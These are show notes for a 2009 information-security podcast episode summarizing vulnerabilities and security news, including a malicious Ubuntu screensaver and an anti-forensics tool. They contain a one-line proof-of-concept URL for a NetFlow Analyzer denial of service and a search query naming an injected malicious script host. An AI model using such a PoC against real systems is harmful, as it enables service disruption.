InfoSec Daily Podcast

InfoSec Podcast Episode 28 for December 15, 2009. 

Vulnerabilities of Interest:

1. SAP AG SAPgui is prone to a remote buffer-overflow vulnerability.  Attackers can exploit this issue to execute arbitrary code within the context of an application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition. SAPgui 6.4 is vulnerable; other versions may also be affected.  A working commercial exploit is available through VUPEN Security – Exploit and PoCs Service. This exploit is not otherwise publicly available or known to be circulating in the wild. Proof of concept and exploit code are available in the wild.
2. Adobe Reader and Acrobat are prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code. Failed exploit attempts will likely cause denial-of-service conditions. This issue affects Adobe Reader and Acrobat versions 9.2 and prior.  The issue is being exploited in the wild.
3. NetFlow Analyzer 7 Professional Plus is subject to a remote looping DoS.  ManageEngine NetFlow Analyzer is a traffic analysis and network forensic tool that leveroges a  wide range of management technologies that are part of Cisco IOS, As the only product that supports Cisco NetFlow, Cisco NBAR , CiscoCBQoS.  This vulnerability is due to a semicolon “;” input validation error.  PoC: http://localhost:8080/;netflow/jspui/dashBoard.do?dId=1
4. Thunderbird 2.0.0.23 (lib) is subject to a Remote Array Overrun (Arbitrary code execution) vulnerability.  The main problem exist in dtoa implementation. Thunderbird has the same
   dtoa as Firefox, etc. This problem affects many additional Add-ons for thunderbird.Thunderbird 2 includes many new features to help you manage your inbox. With Thunderbird 2, it?s easier to prioritize and find your important email with tags and the new find bar helps you find content within your email faster. Lightning brings the Sunbird calendar to the popular email client, Mozilla Thunderbird. Since it’s an extension, Lightning is tightly integrated with Thunderbird, allowing it to easily perform email-related calendaring tasks. Proof of Concept code is available.

News item 1: http://www.wired.com/threatlevel/2009/12/decaf-cofee/ <Rick>
Our first news article, is actually a carry over from last night. We discussed in our pregame show with Adrian, but it appears that some hackers may prefer deCaF to COFEE.   While we reference the wired article on this, there are numerous outlets carrying the story on the new anti-forensics or more specifically the anti-COFEEE tool that was released called DeCaF or the Detect and Eliminate Computer Assisted Forensics tool.  So if you loaded it and played with it you’ll see that it monitors for COFEE and the USB usage and based upon this it allows you to take specific actions such as clear event logs, run programs and of interest, it allows you to uninstall Torrent clients.  We will certainly want to get Rob Lee’s take on this when we have him on.  You can find the tool here: http://decafme.org/

News item 2:  http://extraexploit.blogspot.com/2009/12/318xcom-and-others-evil-domains.html <Rick>
We talked recently about the 318.com iFrame issue and the sheer number of compromised websites.  We someone over on the Full Disclosure mailing list provided a link to a blog where they analyze the 318x.com and other domains that are serving up the “Eldorado” rootkit dropper.  They provide complete links to the analysis of the rootkit as well as the original Goolge query.  So the report indicates that original 318x.com and 3b3.org domains do not appear to currently be active, but what remains is a third domain z360.net which at this time apparently still operating.  If you re-run the query on Google, you will see that it is now up to 830K looking for z360.net.  http://www.google.it/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=Kbr&num=100&q=%22%3Cscript+src%3D%22z360.net%2Fc.js%22%3E%3C%2Fscript%3E%22&btnG=Search&aq=f&oq=

News item 3: http://www.cultofmac.com/operation-chokehold-is-gathering-steam-bring-att-to-its-knees-on-friday/23418 <Rick>
So you guys have probably heard about the proposal for AT&T, more specifically AT&T iPhone customers, to launch an attack against AT&T in a sort of protest against their substandard network.  Called “Operation Chokehold”, the proposal is that on Friday, December 18, at noon Pacific time, which is 3 PM EST, they are hoping to overwhelm the AT&T data network and “bring it to its knees”. The goal is to have every iPhone user (or as many as we can) turn on a data intensive app and run that app for one solid hour. Send the message to AT&T that we are sick of their substandard network and sick of their abusive comments. The idea is we’ll create a digital flash mob.   My take on this is that could prove to be quite interesting from a DoS perspective, obviously impacting not only those trying to make a point, but those that are not.  The implications are wide reaching, and I’m not just speaking about the potential impact to emergency services, but most certainly to the reputation of AT&T.

News item 4:http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=222001810&cid=RSSfeed<Rick>
I’m not sure if this has gotten as much press as I think it deserves, but it appears that Core Security has added support for attacking wireless networks in a new version of CORE IMPACT. The addition of wireless support lets pen testers utilize man-in-the middle attacks and crack the encryption in WEP, WPA, and WPA2-encrypted networks.  So in version 9, you could just sniff a wireless network, with version 10 you not only see them, but you can attack them.

I see this as a wonderful addition and something that would certainly be useful not only for external pen testers, but interal as well.

News item 5:  http://news.yahoo.com/s/nf/20091214/bs_nf/70595 <Rick>
It appears that Obama is now ready for the US to join United Nations talks on cyberwar and Internet crime. That is not the interesting item of the story, what is interesting is that cybercrime report that in 2008, the Internet Crime Complaint Center (IC3) received 275,234 complaints, a 33.1 percent increase from 2007. Attacks cost $264.6 million, up from $239.1 million from in 2007.

What is also interesting are the sticking points in these discussions as it seems that Russia and the U.S. have yet to agree on the criminal investigation components.  It seems that Russia wants to protect its sovereignty regarding investigations of internal cyberactivity.  While the U.S., wants international help in investigating and defending against cybercrimes. This is really not surprising since most cyberattacks against the U.S. military, businesses and personal computers are generated from China and Russia.

Of course, we all know about the Russian / Georgia cyberware.

News item 6: http://www.mxlogic.com/securitynews/web-security/analysts-2010-will-see-surges-in-windows-7-malware-and-application-exploits355.cfm <Rick>
Lavasoft gets our Duh! Award of the day for their prediction that Windows 7 will cause a large-scale shift in the production and distribution of malware.  Since malware overwhelmingly is targeted to Microsoft product the postulate Windows 7 will require new versions of malware.

Lavasoft also stated that non-Windows operating systems could also become targets with the uptick in use of operating systems like Ubuntu, this making them more viable targets for malware infections. Lavasoft also says that the scareware and rogue anti-virus software will continue to be a common type of online scam, bilking victims out of hard cash in return for a bogus product.

Intersting to get their take on things, but this is really more of the same isn’t it?

News item 7: http://digitizor.com/2009/12/10/ubuntu-malware-for-ddos-attack-found-in-screensaver/ <Rick>
Funny that we have a story on a piece of malware that has been found in a .deb file claiming to be a screensaver from Gnome-Look. The malware appears to be an agent for a DDoS attack. This affects Ubuntu and other Debian based OS as well. The .deb file in question is supposedly a screensaver of a waterfall. When installed, the “screensaver” installs some scripts with elavated privileges rather than the screensaver that is expected. The script is designed to auto-update itself and potentially to make the infected system take part in a DDoS attack.

The “screensaver” in question has been removed from Gnome-Look now, but it does sort of give credibility to the Lavasoft report.

News item 8: http://money.cnn.com/magazines/moneymag/bestjobs/2009/snapshots/8.html
John Strand posted this link on the Pauldotcom mailing list.  Now normally, I’m like the anti-callout guy but I’ve got some serious issues with this report.  My two main issues involve the reporting grabbing someone in Atlanta that was a convicted hacker as a reference.  Secondarily, I have an issue with any security professional calling themselves the “World’s Number One Security Expert”.  I would never refer to anyone that was convicted of a crime as anything.